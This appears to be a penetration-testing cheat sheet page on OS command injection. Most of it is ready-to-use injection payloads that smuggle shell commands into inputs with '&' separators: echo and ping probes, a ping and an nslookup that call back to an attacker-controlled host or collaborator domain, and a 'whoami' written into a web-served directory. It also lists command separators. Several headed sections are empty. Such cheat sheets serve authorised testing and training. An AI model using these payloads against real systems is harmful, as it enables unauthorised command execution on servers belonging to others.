search

Exploitation

circle-check

Do not forget to use urlencoding

Reflected

& echo test123 &

Blind

& ping -c 10 127.0.0.1 &

Blind (ping rce listener)

Kali:

tcpdump -i <NETWORK_CARD> icmp

Victim:

& ping <KALI_IP> &

BLIND OAST

& nslookup collaborator-link.net &

Blind redirecting the input

& whoami > /var/www/static/whoami.txt &

hashtag
Command seperators

Copy

&
&&
|
||

hashtag
More command seperators

Copy

hashtag
Inline Command Execution (Linux)

Copy

hashtag
Check if command is executed via cmd or powershell

Copy

PreviousComand whitelisting bypassNextServer Side Template Injection

Last updated